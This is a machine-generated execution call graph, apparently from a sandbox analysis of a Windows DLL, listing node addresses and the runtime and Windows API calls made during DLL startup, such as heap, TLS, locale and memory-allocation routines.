                                                                                                        execution_graph 17398 10017b85 17399 10017b91 17398->17399 17400 10017b8c 17398->17400 17404 10017a8f 17399->17404 17416 1001f914 17400->17416 17403 10017ba2 17407 10017a9b __lseeki64 17404->17407 17405 10017ae8 17414 10017b38 __lseeki64 17405->17414 17476 100088e0 17405->17476 17407->17405 17407->17414 17420 100178b6 17407->17420 17410 10017b18 17412 100178b6 __CRT_INIT@12 162 API calls 17410->17412 17410->17414 17411 100088e0 ___DllMainCRTStartup 138 API calls 17413 10017b0f 17411->17413 17412->17414 17415 100178b6 __CRT_INIT@12 162 API calls 17413->17415 17414->17403 17415->17410 17417 1001f944 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 17416->17417 17418 1001f937 17416->17418 17419 1001f93b 17417->17419 17418->17417 17418->17419 17419->17399 17421 100179e0 17420->17421 17422 100178c9 GetProcessHeap HeapAlloc 17420->17422 17423 100179e6 17421->17423 17424 10017a1b 17421->17424 17425 100178ed GetVersionExA 17422->17425 17433 100178e6 17422->17433 17430 10017a05 17423->17430 17423->17433 17631 10018033 17423->17631 17428 10017a20 17424->17428 17429 10017a79 17424->17429 17426 10017908 GetProcessHeap HeapFree 17425->17426 17427 100178fd GetProcessHeap HeapFree 17425->17427 17431 10017934 17426->17431 17427->17433 17634 1001bddb TlsGetValue 17428->17634 17429->17433 17676 1001c0b2 17429->17676 17430->17433 17440 1001f295 __ioterm 67 API calls 17430->17440 17496 1001a305 HeapCreate 17431->17496 17433->17405 17439 1001796a 17439->17433 17506 1001c11b GetModuleHandleA 17439->17506 17442 10017a0f 17440->17442 17445 1001be05 __mtterm 5 API calls 17442->17445 17443 10017a3d 17645 1001bd6f TlsGetValue 17443->17645 17448 10017a14 17445->17448 17447 10017978 __RTC_Initialize 17452 1001798b GetCommandLineA 17447->17452 17467 1001797c 17447->17467 17449 1001a35f __heap_term 4 API calls 17448->17449 17449->17433 17539 1001f60d 17452->17539 17453 10017a56 17652 1001be42 17453->17652 17454 10017a6d 17663 10016380 17454->17663 17459 10017a5d GetCurrentThreadId 17459->17433 17460 10017a73 17460->17433 17462 100179a5 17463 100179b0 17462->17463 17464 100179a9 17462->17464 17595 1001f554 17463->17595 17589 1001be05 17464->17589 17583 1001a35f 17467->17583 17469 100179c9 17475 100179ce 17469->17475 17626 1001f295 17469->17626 17475->17433 18519 10008860 17476->18519 17479 10008966 18530 1001771b 17479->18530 17481 10008970 17481->17410 17481->17411 17482 10008932 ___DllMainCRTStartup 17483 10008a00 ___DllMainCRTStartup 17482->17483 17484 10008a36 ___DllMainCRTStartup 17482->17484 17485 10008a1a VirtualAllocExNuma 17483->17485 17486 10008a4e VirtualAlloc 17484->17486 17487 10008a66 17485->17487 17486->17487 17488 10016a10 _memcpy_s __VEC_memcpy 17487->17488 17489 10008a78 17488->17489 17490 1001703b _malloc 66 API calls 17489->17490 17491 10008a87 17490->17491 18524 10002fa0 17491->18524 17493 10008a9d ___DllMainCRTStartup 18527 10002d20 17493->18527 17497 1001a325 17496->17497 17498 1001a328 17496->17498 17497->17439 17687 1001a2aa 17498->17687 17501 1001a337 17696 1001a57a HeapAlloc 17501->17696 17502 1001a35b 17502->17439 17505 1001a346 HeapDestroy 17505->17497 17507 1001c136 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 17506->17507 17508 1001c12d 17506->17508 17510 1001c180 TlsAlloc 17507->17510 17509 1001be05 __mtterm 5 API calls 17508->17509 17512 1001c132 17509->17512 17513 1001c29a 17510->17513 17514 1001c1ce TlsSetValue 17510->17514 17512->17447 17513->17447 17514->17513 17515 1001c1df 17514->17515 17751 10018042 17515->17751 17520 1001bd03 __encode_pointer 4 API calls 17521 1001c1ff 17520->17521 17522 1001bd03 __encode_pointer 4 API calls 17521->17522 17523 1001c20f 17522->17523 17524 1001bd03 __encode_pointer 4 API calls 17523->17524 17525 1001c21f 17524->17525 17765 1001a3d3 17525->17765 17528 1001c295 17530 1001be05 __mtterm 5 API calls 17528->17530 17529 1001bd6f __decode_pointer 4 API calls 17531 1001c240 17529->17531 17530->17513 17531->17528 17532 1001e76e __calloc_crt 66 API calls 17531->17532 17533 1001c259 17532->17533 17533->17528 17534 1001bd6f __decode_pointer 4 API calls 17533->17534 17535 1001c273 17534->17535 17535->17528 17536 1001c27a 17535->17536 17537 1001be42 __initptd 66 API calls 17536->17537 17538 1001c282 GetCurrentThreadId 17537->17538 17538->17513 17540 1001f629 GetEnvironmentStringsW 17539->17540 17544 1001f648 17539->17544 17541 1001f63d GetLastError 17540->17541 17543 1001f631 17540->17543 17541->17544 17542 1001f6e3 17545 1001f6eb GetEnvironmentStrings 17542->17545 17548 1001799b 17542->17548 17546 1001f663 GetEnvironmentStringsW 17543->17546 17547 1001f672 WideCharToMultiByte 17543->17547 17544->17542 17544->17543 17545->17548 17549 1001f6fb 17545->17549 17546->17547 17546->17548 17551 1001f6a6 17547->17551 17552 1001f6d8 FreeEnvironmentStringsW 17547->17552 17566 1001f055 17548->17566 17554 1001e72e __malloc_crt 66 API calls 17549->17554 17788 1001e72e 17551->17788 17552->17548 17556 1001f714 17554->17556 17558 1001f727 17556->17558 17559 1001f71b FreeEnvironmentStringsA 17556->17559 17793 10016a10 17558->17793 17559->17548 17560 1001f6b5 WideCharToMultiByte 17562 1001f6cf 17560->17562 17563 1001f6c6 17560->17563 17562->17552 17565 10016380 __mtinitlocknum 66 API calls 17563->17565 17565->17562 18012 1001984c 17566->18012 17568 1001f061 GetStartupInfoA 17569 1001e76e __calloc_crt 66 API calls 17568->17569 17575 1001f082 17569->17575 17570 1001f28c __lseeki64 17570->17462 17571 1001f209 GetStdHandle 17577 1001f1d3 17571->17577 17572 1001f26e SetHandleCount 17572->17570 17573 1001e76e __calloc_crt 66 API calls 17573->17575 17574 1001f21b GetFileType 17574->17577 17575->17570 17575->17573 17576 1001f156 17575->17576 17575->17577 17576->17577 17579 1001f18a 17576->17579 17580 1001f17f GetFileType 17576->17580 17577->17571 17577->17572 17577->17574 17581 1001f232 17577->17581 17578 1001febd ___crtInitCritSecAndSpinCount 66 API calls 17578->17581 17579->17570 17579->17576 17582 1001febd ___crtInitCritSecAndSpinCount 66 API calls 17579->17582 17580->17576 17580->17579 17581->17570 17581->17577 17581->17578 17582->17579 17584 1001a36b 17583->17584 17585 1001a3bf HeapDestroy 17583->17585 17586 1001a3ae HeapFree 17584->17586 17587 1001a387 VirtualFree HeapFree 17584->17587 17585->17433 17586->17585 17587->17587 17588 1001a3ad 17587->17588 17588->17586 17590 1001be0f 17589->17590 17594 1001be1b 17589->17594 17591 1001bd6f __decode_pointer 4 API calls 17590->17591 17591->17594 17592 1001be3d 17592->17592 17593 1001be2f TlsFree 17593->17592 17594->17592 17594->17593 17596 1001f567 17595->17596 17597 1001f56c GetModuleFileNameA 17595->17597 18013 1001db1f 17596->18013 17599 1001f593 17597->17599 18017 1001f3bc 17599->18017 17601 100179b5 17601->17469 17606 1001f2e1 17601->17606 17603 1001e72e __malloc_crt 66 API calls 17604 1001f5d5 17603->17604 17604->17601 17605 1001f3bc _parse_cmdline 76 API calls 17604->17605 17605->17601 17607 1001f2ee 17606->17607 17609 1001f2f3 _strlen 17606->17609 17608 1001db1f ___initmbctable 109 API calls 17607->17608 17608->17609 17610 1001e76e __calloc_crt 66 API calls 17609->17610 17613 100179be 17609->17613 17618 1001f326 _strlen 17610->17618 17611 1001f381 17612 10016380 __mtinitlocknum 66 API calls 17611->17612 17612->17613 17613->17469 17620 10017ec2 17613->17620 17614 1001e76e __calloc_crt 66 API calls 17614->17618 17615 1001f3a6 17616 10016380 __mtinitlocknum 66 API calls 17615->17616 17616->17613 17617 1001808e _strcpy_s 66 API calls 17617->17618 17618->17611 17618->17613 17618->17614 17618->17615 17618->17617 17619 1001c49a __invoke_watson 10 API calls 17618->17619 17619->17618 17622 10017ecb __except_handler4 17620->17622 18322 1001fc66 17622->18322 17623 10017eea __initterm_e 17625 10017f0b __except_handler4 17623->17625 18326 100176f3 17623->18326 17625->17469 17627 1001f29c 17626->17627 17628 100179de 17627->17628 17629 1001f2b0 DeleteCriticalSection 17627->17629 17630 10016380 __mtinitlocknum 66 API calls 17627->17630 17628->17464 17629->17627 17630->17627 18425 10017f54 17631->18425 17633 1001803e 17633->17430 17635 10017a25 17634->17635 17636 1001bdeb 17634->17636 17639 1001e76e 17635->17639 17637 1001bd6f __decode_pointer 4 API calls 17636->17637 17638 1001bdf6 TlsSetValue 17637->17638 17638->17635 17642 1001e772 17639->17642 17641 10017a31 17641->17433 17641->17443 17642->17641 17643 1001e792 Sleep 17642->17643 18445 100170fe 17642->18445 17644 1001e7a7 17643->17644 17644->17641 17644->17642 17646 1001bda3 GetModuleHandleA 17645->17646 17647 1001bd82 17645->17647 17648 1001bdb2 GetProcAddress 17646->17648 17649 10017a4f 17646->17649 17647->17646 17650 1001bd8c TlsGetValue 17647->17650 17648->17649 17649->17453 17649->17454 17651 1001bd97 17650->17651 17651->17646 17651->17649 18462 1001984c 17652->18462 17654 1001be4e GetModuleHandleA 17655 1001be70 GetProcAddress GetProcAddress 17654->17655 17656 1001be94 InterlockedIncrement 17654->17656 17655->17656 17657 1001a549 __lock 62 API calls 17656->17657 17658 1001bebb 17657->17658 17659 1001dc7d ___addlocaleref 8 API calls 17658->17659 17660 1001beda 17659->17660 18463 1001beed 17660->18463 17662 1001bee7 __lseeki64 17662->17459 17665 1001638c __lseeki64 17663->17665 17664 10016405 _realloc __lseeki64 17664->17460 17665->17664 17667 1001a549 __lock 64 API calls 17665->17667 17675 100163cb 17665->17675 17666 100163e0 RtlFreeHeap 17666->17664 17668 100163f2 17666->17668 17671 100163a3 ___sbh_find_block 17667->17671 17669 10017d62 __lseeki64 64 API calls 17668->17669 17670 100163f7 GetLastError 17669->17670 17670->17664 17672 100163bd 17671->17672 18467 1001a5ed 17671->18467 18473 100163d6 17672->18473 17675->17664 17675->17666 17677 1001c0bb 17676->17677 17686 1001c106 17676->17686 17678 1001c0c4 TlsGetValue 17677->17678 17682 1001c0e7 17677->17682 17681 1001c0d7 TlsGetValue 17678->17681 17678->17682 17679 1001c111 TlsSetValue 17680 1001c11a 17679->17680 17680->17433 17681->17682 17683 1001bd6f __decode_pointer 4 API calls 17682->17683 17684 1001c0fd 17683->17684 18477 1001bf91 17684->18477 17686->17679 17686->17680 17698 10017e4f 17687->17698 17692 1001a2d0 17712 10017e86 17692->17712 17693 1001a2dc 17694 1001a2eb 17693->17694 17695 1001c49a __invoke_watson 10 API calls 17693->17695 17694->17501 17694->17502 17695->17694 17697 1001a341 17696->17697 17697->17502 17697->17505 17699 10017e5a 17698->17699 17700 10017e80 17699->17700 17719 10017d62 17699->17719 17700->17692 17705 1001c49a 17700->17705 17740 100174d0 17705->17740 17707 1001c52b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17708 1001c562 __invoke_watson 17707->17708 17709 1001c56e GetCurrentProcess TerminateProcess 17707->17709 17708->17709 17742 100167d5 17709->17742 17711 1001c58e 17711->17692 17713 10017e91 17712->17713 17714 10017d62 __lseeki64 66 API calls 17713->17714 17715 10017eb6 17713->17715 17716 10017e96 17714->17716 17715->17693 17717 1001c596 __lseeki64 4 API calls 17716->17717 17718 10017ea6 17717->17718 17718->17693 17725 1001bef6 GetLastError 17719->17725 17721 10017d67 17722 1001c596 17721->17722 17723 1001bd6f __decode_pointer 4 API calls 17722->17723 17724 1001c5a4 __invoke_watson 17723->17724 17726 1001bddb ___set_flsgetvalue 6 API calls 17725->17726 17727 1001bf05 TlsGetValue 17726->17727 17728 1001bf19 17727->17728 17729 1001bf6d SetLastError 17728->17729 17730 1001e76e __calloc_crt 62 API calls 17728->17730 17729->17721 17731 1001bf2b 17730->17731 17731->17729 17732 1001bd6f __decode_pointer 4 API calls 17731->17732 17733 1001bf45 17732->17733 17734 1001bf64 17733->17734 17735 1001bf4c 17733->17735 17737 10016380 __mtinitlocknum 62 API calls 17734->17737 17736 1001be42 __initptd 62 API calls 17735->17736 17738 1001bf54 GetCurrentThreadId 17736->17738 17739 1001bf6a 17737->17739 17738->17729 17739->17729 17741 100174dc __VEC_memzero 17740->17741 17741->17707 17743 100167dd 17742->17743 17744 100167df IsDebuggerPresent 17742->17744 17743->17711 17750 100227fb 17744->17750 17747 1001c457 SetUnhandledExceptionFilter UnhandledExceptionFilter 17748 1001c474 __invoke_watson 17747->17748 17749 1001c47c GetCurrentProcess TerminateProcess 17747->17749 17748->17749 17749->17711 17750->17747 17769 1001bd66 17751->17769 17753 10018048 __init_pointers 17772 1001c322 17753->17772 17756 1001bd03 __encode_pointer 4 API calls 17757 10018084 17756->17757 17758 1001bd03 TlsGetValue 17757->17758 17759 1001bd37 GetModuleHandleA 17758->17759 17760 1001bd16 17758->17760 17762 1001bd2f 17759->17762 17763 1001bd46 GetProcAddress 17759->17763 17760->17759 17761 1001bd20 TlsGetValue 17760->17761 17764 1001bd2b 17761->17764 17762->17520 17763->17762 17764->17759 17764->17762 17766 1001a3dc 17765->17766 17768 1001a40a 17766->17768 17775 1001febd 17766->17775 17768->17528 17768->17529 17770 1001bd03 __encode_pointer 4 API calls 17769->17770 17771 1001bd6d 17770->17771 17771->17753 17773 1001bd03 __encode_pointer 4 API calls 17772->17773 17774 1001807a 17773->17774 17774->17756 17776 1001fec9 __lseeki64 17775->17776 17777 1001bd6f __decode_pointer 4 API calls 17776->17777 17778 1001fed9 17777->17778 17779 10017e4f ___crtInitCritSecAndSpinCount 64 API calls 17778->17779 17785 1001ff2d __lseeki64 17778->17785 17780 1001fee9 17779->17780 17781 1001fef8 17780->17781 17782 1001c49a __invoke_watson 10 API calls 17780->17782 17783 1001ff01 GetModuleHandleA 17781->17783 17784 1001ff22 17781->17784 17782->17781 17783->17784 17786 1001ff10 GetProcAddress 17783->17786 17787 1001bd03 __encode_pointer 4 API calls 17784->17787 17785->17766 17786->17784 17787->17785 17790 1001e732 17788->17790 17791 1001e769 17790->17791 17792 1001e74a Sleep 17790->17792 17797 1001703b 17790->17797 17791->17552 17791->17560 17792->17790 17794 10016a28 17793->17794 17795 10016a4f __VEC_memcpy 17794->17795 17796 10016a57 FreeEnvironmentStringsA 17794->17796 17795->17796 17796->17548 17798 100170e8 17797->17798 17809 10017049 17797->17809 17799 1001e520 __calloc_impl 4 API calls 17798->17799 17800 100170ee 17799->17800 17802 10017d62 __lseeki64 65 API calls 17800->17802 17803 100170f4 17802->17803 17803->17790 17806 100170ac RtlAllocateHeap 17806->17809 17808 100170df 17808->17790 17809->17806 17809->17808 17810 1001705e 17809->17810 17811 100170d3 17809->17811 17814 100170d1 17809->17814 17862 10016fec 17809->17862 17870 1001e520 17809->17870 17810->17809 17816 1001e4dd 17810->17816 17825 1001e33d 17810->17825 17859 10017df0 17810->17859 17812 10017d62 __lseeki64 65 API calls 17811->17812 17812->17814 17815 10017d62 __lseeki64 65 API calls 17814->17815 17815->17808 17873 10023c17 17816->17873 17818 1001e4e4 17819 1001e4f1 17818->17819 17820 10023c17 __NMSG_WRITE 66 API calls 17818->17820 17821 1001e33d __NMSG_WRITE 66 API calls 17819->17821 17824 1001e513 17819->17824 17820->17819 17822 1001e509 17821->17822 17823 1001e33d __NMSG_WRITE 66 API calls 17822->17823 17823->17824 17824->17810 17826 1001e349 17825->17826 17827 10023c17 __NMSG_WRITE 63 API calls 17826->17827 17858 1001e49f 17826->17858 17828 1001e369 17827->17828 17829 1001e4a4 GetStdHandle 17828->17829 17831 10023c17 __NMSG_WRITE 63 API calls 17828->17831 17830 1001e4b2 _strlen 17829->17830 17829->17858 17834 1001e4cc WriteFile 17830->17834 17830->17858 17832 1001e37a 17831->17832 17832->17829 17833 1001e38c 17832->17833 17833->17858 17880 1001808e 17833->17880 17834->17858 17836 1001e3c2 GetModuleFileNameA 17839 1001e3e0 17836->17839 17843 1001e403 _strlen 17836->17843 17838 1001c49a __invoke_watson 10 API calls 17840 1001e3bf 17838->17840 17841 1001808e _strcpy_s 63 API calls 17839->17841 17840->17836 17842 1001e3f0 17841->17842 17842->17843 17845 1001c49a __invoke_watson 10 API calls 17842->17845 17844 1001e446 17843->17844 17889 100199d4 17843->17889 17898 10019e3b 17844->17898 17845->17843 17850 1001e46a 17852 10019e3b _strcat_s 63 API calls 17850->17852 17851 1001c49a __invoke_watson 10 API calls 17851->17850 17853 1001e47b 17852->17853 17855 1001e48c 17853->17855 17856 1001c49a __invoke_watson 10 API calls 17853->17856 17854 1001c49a __invoke_watson 10 API calls 17854->17844 17907 10023a79 17855->17907 17856->17855 17858->17810 17944 10017dca GetModuleHandleA 17859->17944 17863 10016ff8 __lseeki64 17862->17863 17864 10017029 __lseeki64 17863->17864 17947 1001a549 17863->17947 17864->17809 17866 1001700e 17954 1001ad96 17866->17954 17871 1001bd6f __decode_pointer 4 API calls 17870->17871 17872 1001e52b 17871->17872 17872->17809 17874 10023c22 17873->17874 17875 10017d62 __lseeki64 66 API calls 17874->17875 17876 10023c2c 17874->17876 17877 10023c45 17875->17877 17876->17818 17878 1001c596 __lseeki64 4 API calls 17877->17878 17879 10023c55 17878->17879 17879->17818 17881 100180a3 17880->17881 17882 1001809b 17880->17882 17883 10017d62 __lseeki64 66 API calls 17881->17883 17882->17881 17887 100180ca 17882->17887 17884 100180a8 17883->17884 17885 1001c596 __lseeki64 4 API calls 17884->17885 17886 100180b7 17885->17886 17886->17836 17886->17838 17887->17886 17888 10017d62 __lseeki64 66 API calls 17887->17888 17888->17884 17890 100199e4 17889->17890 17891 100199e8 17890->17891 17893 100199ed 17890->17893 17896 10019a2e 17890->17896 17892 10017d62 __lseeki64 66 API calls 17891->17892 17891->17893 17894 10019a04 17892->17894 17893->17844 17893->17854 17895 1001c596 __lseeki64 4 API calls 17894->17895 17895->17893 17896->17893 17897 10017d62 __lseeki64 66 API calls 17896->17897 17897->17894 17899 10019e50 17898->17899 17901 10019e48 17898->17901 17900 10017d62 __lseeki64 66 API calls 17899->17900 17906 10019e55 17900->17906 17901->17899 17903 10019e85 17901->17903 17902 1001c596 __lseeki64 4 API calls 17904 10019e64 17902->17904 17903->17904 17905 10017d62 __lseeki64 66 API calls 17903->17905 17904->17850 17904->17851 17905->17906 17906->17902 17908 1001bd66 FindHandlerForForeignException 4 API calls 17907->17908 17909 10023a87 17908->17909 17910 10023aa1 LoadLibraryA 17909->17910 17915 10023b48 17909->17915 17911 10023ab2 17910->17911 17912 10023ab9 GetProcAddress 17910->17912 17911->17858 17912->17911 17914 10023acb 17912->17914 17913 10023bc7 17916 1001bd6f __decode_pointer 4 API calls 17913->17916 17934 10023bac 17913->17934 17917 1001bd03 __encode_pointer 4 API calls 17914->17917 17915->17913 17919 1001bd6f __decode_pointer 4 API calls 17915->17919 17925 10023bd6 17916->17925 17920 10023ad1 GetProcAddress 17917->17920 17918 1001bd6f __decode_pointer 4 API calls 17918->17911 17924 10023b68 17919->17924 17921 1001bd03 __encode_pointer 4 API calls 17920->17921 17922 10023ae6 GetProcAddress 17921->17922 17926 1001bd03 __encode_pointer 4 API calls 17922->17926 17923 10023b94 17928 10017e86 ___crtMessageBoxA 60 API calls 17923->17928 17924->17923 17927 1001bd6f __decode_pointer 4 API calls 17924->17927 17931 1001bd6f __decode_pointer 4 API calls 17925->17931 17925->17934 17929 10023afb 17926->17929 17930 10023b87 17927->17930 17932 10023b9d 17928->17932 17933 10017e4f ___crtInitCritSecAndSpinCount 60 API calls 17929->17933 17930->17913 17930->17923 17931->17934 17932->17934 17937 1001c49a __invoke_watson 10 API calls 17932->17937 17935 10023b09 17933->17935 17934->17918 17936 10023b19 17935->17936 17938 1001c49a __invoke_watson 10 API calls 17935->17938 17936->17915 17939 10023b22 GetProcAddress 17936->17939 17937->17934 17938->17936 17940 1001bd03 __encode_pointer 4 API calls 17939->17940 17941 10023b30 17940->17941 17941->17915 17942 10023b3a GetProcAddress 17941->17942 17943 1001bd03 __encode_pointer 4 API calls 17942->17943 17943->17915 17945 10017dd9 GetProcAddress 17944->17945 17946 10017de9 ExitProcess 17944->17946 17945->17946 17948 1001a55c 17947->17948 17949 1001a56f EnterCriticalSection 17947->17949 17963 1001a486 17948->17963 17949->17866 17951 1001a562 17951->17949 17989 10017da6 17951->17989 17957 1001adc2 17954->17957 17955 1001ae5b 17959 10017019 17955->17959 18007 1001a9b1 17955->18007 17957->17955 17957->17959 18000 1001a901 17957->18000 17960 10017032 17959->17960 18011 1001a471 LeaveCriticalSection 17960->18011 17962 10017039 17962->17864 17964 1001a492 __lseeki64 17963->17964 17965 1001e4dd __FF_MSGBANNER 66 API calls 17964->17965 17976 1001a4b8 17964->17976 17967 1001a4a7 17965->17967 17966 1001e72e __malloc_crt 66 API calls 17968 1001a4d3 17966->17968 17969 1001e33d __NMSG_WRITE 66 API calls 17967->17969 17971 1001a4e9 17968->17971 17972 1001a4da 17968->17972 17970 1001a4ae 17969->17970 17973 10017df0 __mtinitlocknum 3 API calls 17970->17973 17975 1001a549 __lock 66 API calls 17971->17975 17974 10017d62 __lseeki64 66 API calls 17972->17974 17973->17976 17977 1001a4c8 __lseeki64 17974->17977 17978 1001a4f0 17975->17978 17976->17966 17976->17977 17977->17951 17979 1001a524 17978->17979 17980 1001a4f8 17978->17980 17981 10016380 __mtinitlocknum 66 API calls 17979->17981 17982 1001febd ___crtInitCritSecAndSpinCount 66 API calls 17980->17982 17984 1001a515 17981->17984 17983 1001a503 17982->17983 17983->17984 17985 10016380 __mtinitlocknum 66 API calls 17983->17985 17996 1001a540 17984->17996 17987 1001a50f 17985->17987 17988 10017d62 __lseeki64 66 API calls 17987->17988 17988->17984 17990 1001e4dd __FF_MSGBANNER 66 API calls 17989->17990 17991 10017dab 17990->17991 17992 1001e33d __NMSG_WRITE 66 API calls 17991->17992 17993 10017db4 17992->17993 17994 1001bd6f __decode_pointer 4 API calls 17993->17994 17995 10017dbf 17994->17995 17995->17949 17999 1001a471 LeaveCriticalSection 17996->17999 17998 1001a547 17998->17977 17999->17998 18001 1001a914 HeapReAlloc 18000->18001 18002 1001a948 HeapAlloc 18000->18002 18003 1001a932 18001->18003 18004 1001a936 18001->18004 18002->18003 18005 1001a96b VirtualAlloc 18002->18005 18003->17955 18004->18002 18005->18003 18006 1001a985 HeapFree 18005->18006 18006->18003 18008 1001a9c6 VirtualAlloc 18007->18008 18010 1001aa0d 18008->18010 18010->17959 18011->17962 18012->17568 18014 1001db28 18013->18014 18015 1001db2f 18013->18015 18023 1001d985 18014->18023 18015->17597 18018 1001f3d9 18017->18018 18021 1001f446 18018->18021 18316 10019f12 18018->18316 18020 1001f544 18020->17601 18020->17603 18021->18020 18022 10019f12 76 API calls _parse_cmdline 18021->18022 18022->18021 18024 1001d991 __lseeki64 18023->18024 18054 1001bf79 18024->18054 18028 1001d9a4 18075 1001d760 18028->18075 18031 1001e72e __malloc_crt 66 API calls 18032 1001d9c5 18031->18032 18033 1001dae4 __lseeki64 18032->18033 18082 1001d7da 18032->18082 18033->18015 18036 1001daf1 18036->18033 18041 1001db04 18036->18041 18044 10016380 __mtinitlocknum 66 API calls 18036->18044 18037 1001d9f5 InterlockedDecrement 18038 1001da05 18037->18038 18039 1001da16 InterlockedIncrement 18037->18039 18038->18039 18043 10016380 __mtinitlocknum 66 API calls 18038->18043 18039->18033 18040 1001da2c 18039->18040 18040->18033 18046 1001a549 __lock 66 API calls 18040->18046 18042 10017d62 __lseeki64 66 API calls 18041->18042 18042->18033 18045 1001da15 18043->18045 18044->18041 18045->18039 18048 1001da40 InterlockedDecrement 18046->18048 18049 1001dabc 18048->18049 18050 1001dacf InterlockedIncrement 18048->18050 18049->18050 18052 10016380 __mtinitlocknum 66 API calls 18049->18052 18091 1001dae6 18050->18091 18053 1001dace 18052->18053 18053->18050 18055 1001bef6 __getptd_noexit 66 API calls 18054->18055 18056 1001bf7f 18055->18056 18057 1001bf8c 18056->18057 18058 10017da6 __amsg_exit 66 API calls 18056->18058 18059 1001d6bc 18057->18059 18058->18057 18060 1001d6c8 __lseeki64 18059->18060 18061 1001bf79 FindHandlerForForeignException 66 API calls 18060->18061 18062 1001d6cd 18061->18062 18063 1001d6df 18062->18063 18064 1001a549 __lock 66 API calls 18062->18064 18066 1001d6ed __lseeki64 18063->18066 18068 10017da6 __amsg_exit 66 API calls 18063->18068 18065 1001d6fd 18064->18065 18067 1001d746 18065->18067 18070 1001d714 InterlockedDecrement 18065->18070 18071 1001d72e InterlockedIncrement 18065->18071 18066->18028 18094 1001d757 18067->18094 18068->18066 18070->18071 18072 1001d71f 18070->18072 18071->18067 18072->18071 18073 10016380 __mtinitlocknum 66 API calls 18072->18073 18074 1001d72d 18073->18074 18074->18071 18098 10016e2b 18075->18098 18078 1001d79b 18080 1001d7a0 GetACP 18078->18080 18081 1001d78d 18078->18081 18079 1001d77d GetOEMCP 18079->18081 18080->18081 18081->18031 18081->18033 18083 1001d760 getSystemCP 78 API calls 18082->18083 18085 1001d7f8 18083->18085 18084 1001d803 setSBCS 18087 100167d5 _$I10_OUTPUT 5 API calls 18084->18087 18085->18084 18086 1001d82b GetCPInfo 18085->18086 18090 1001d83e _memset __setmbcp_nolock 18085->18090 18086->18084 18086->18090 18088 1001d983 18087->18088 18088->18036 18088->18037 18189 1001d532 GetCPInfo 18090->18189 18315 1001a471 LeaveCriticalSection 18091->18315 18093 1001daed 18093->18033 18097 1001a471 LeaveCriticalSection 18094->18097 18096 1001d75e 18096->18063 18097->18096 18099 10016e3a 18098->18099 18105 10016e87 18098->18105 18100 1001bf79 FindHandlerForForeignException 66 API calls 18099->18100 18101 10016e3f 18100->18101 18102 10016e67 18101->18102 18106 1001ddcd 18101->18106 18104 1001d6bc __setmbcp 68 API calls 18102->18104 18102->18105 18104->18105 18105->18078 18105->18079 18107 1001ddd9 __lseeki64 18106->18107 18108 1001bf79 FindHandlerForForeignException 66 API calls 18107->18108 18109 1001ddde 18108->18109 18110 1001de0c 18109->18110 18112 1001ddf0 18109->18112 18111 1001a549 __lock 66 API calls 18110->18111 18113 1001de13 18111->18113 18114 1001bf79 FindHandlerForForeignException 66 API calls 18112->18114 18121 1001dd8f 18113->18121 18116 1001ddf5 18114->18116 18119 1001de03 __lseeki64 18116->18119 18120 10017da6 __amsg_exit 66 API calls 18116->18120 18119->18102 18120->18119 18122 1001dd93 18121->18122 18123 1001ddc5 18121->18123 18122->18123 18132 1001dc7d InterlockedIncrement 18122->18132 18129 1001de37 18123->18129 18125 1001dda6 18125->18123 18144 1001dd03 18125->18144 18188 1001a471 LeaveCriticalSection 18129->18188 18131 1001de3e 18131->18116 18133 1001dc98 InterlockedIncrement 18132->18133 18134 1001dc9b 18132->18134 18133->18134 18135 1001dca5 InterlockedIncrement 18134->18135 18136 1001dca8 18134->18136 18135->18136 18137 1001dcb2 InterlockedIncrement 18136->18137 18138 1001dcb5 18136->18138 18137->18138 18139 1001dcbf InterlockedIncrement 18138->18139 18140 1001dcc2 18138->18140 18139->18140 18141 1001dcd7 InterlockedIncrement 18140->18141 18142 1001dcf0 InterlockedIncrement 18140->18142 18143 1001dce7 InterlockedIncrement 18140->18143 18141->18140 18142->18125 18143->18140 18145 1001dd8b 18144->18145 18146 1001dd0c InterlockedDecrement 18144->18146 18145->18123 18158 1001db3d 18145->18158 18147 1001dd22 InterlockedDecrement 18146->18147 18148 1001dd25 18146->18148 18147->18148 18149 1001dd32 18148->18149 18150 1001dd2f InterlockedDecrement 18148->18150 18151 1001dd3c InterlockedDecrement 18149->18151 18152 1001dd3f 18149->18152 18150->18149 18151->18152 18153 1001dd49 InterlockedDecrement 18152->18153 18154 1001dd4c 18152->18154 18153->18154 18155 1001dd61 InterlockedDecrement 18154->18155 18156 1001dd71 InterlockedDecrement 18154->18156 18157 1001dd7a InterlockedDecrement 18154->18157 18155->18154 18156->18154 18157->18145 18159 1001dbbe 18158->18159 18163 1001db51 18158->18163 18161 10016380 __mtinitlocknum 66 API calls 18159->18161 18162 1001dc0b 18159->18162 18160 1001dc32 18170 1001dc71 18160->18170 18178 10016380 66 API calls __mtinitlocknum 18160->18178 18165 1001dbdf 18161->18165 18162->18160 18164 100235dd ___free_lc_time 66 API calls 18162->18164 18163->18159 18169 10016380 __mtinitlocknum 66 API calls 18163->18169 18171 1001db85 18163->18171 18166 1001dc2b 18164->18166 18167 10016380 __mtinitlocknum 66 API calls 18165->18167 18168 10016380 __mtinitlocknum 66 API calls 18166->18168 18172 1001dbf2 18167->18172 18168->18160 18174 1001db7a 18169->18174 18175 10016380 __mtinitlocknum 66 API calls 18170->18175 18176 10016380 __mtinitlocknum 66 API calls 18171->18176 18187 1001dba6 18171->18187 18177 10016380 __mtinitlocknum 66 API calls 18172->18177 18173 10016380 __mtinitlocknum 66 API calls 18179 1001dbb3 18173->18179 18181 100237ad ___free_lconv_mon 66 API calls 18174->18181 18182 1001dc77 18175->18182 18183 1001db9b 18176->18183 18184 1001dc00 18177->18184 18178->18160 18180 10016380 __mtinitlocknum 66 API calls 18179->18180 18180->18159 18181->18171 18182->18123 18185 1002376d ___free_lconv_num 66 API calls 18183->18185 18186 10016380 __mtinitlocknum 66 API calls 18184->18186 18185->18187 18186->18162 18187->18173 18188->18131 18190 1001d612 18189->18190 18192 1001d569 _memset 18189->18192 18195 100167d5 _$I10_OUTPUT 5 API calls 18190->18195 18199 1002359d 18192->18199 18197 1001d6b4 18195->18197 18197->18090 18198 1001e200 ___crtLCMapStringA 101 API calls 18198->18190 18200 10016e2b _LocaleUpdate::_LocaleUpdate 76 API calls 18199->18200 18201 100235ae 18200->18201 18209 100233e5 18201->18209 18204 1001e200 18205 10016e2b _LocaleUpdate::_LocaleUpdate 76 API calls 18204->18205 18206 1001e211 18205->18206 18268 1001de5e 